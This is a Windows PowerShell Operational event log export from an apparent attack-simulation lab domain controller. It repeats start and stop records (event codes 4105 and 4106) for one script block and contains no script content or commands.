Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472214
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472213
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472212
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472211
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472210
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472209
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472208
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472207
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472206
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472205
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472204
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472203
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472202
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472201
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472200
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472199
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472198
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472197
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472196
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472195
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472194
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472193
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472192
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472191
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472190
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472189
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472188
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472187
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472186
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472185
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472184
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472183
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472182
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472181
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472180
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472179
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472178
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472177
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472176
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472175
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472174
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472173
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472172
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472171
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472170
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472169
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472168
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472167
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472166
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472165
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472164
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472163
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472162
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472161
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472160
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
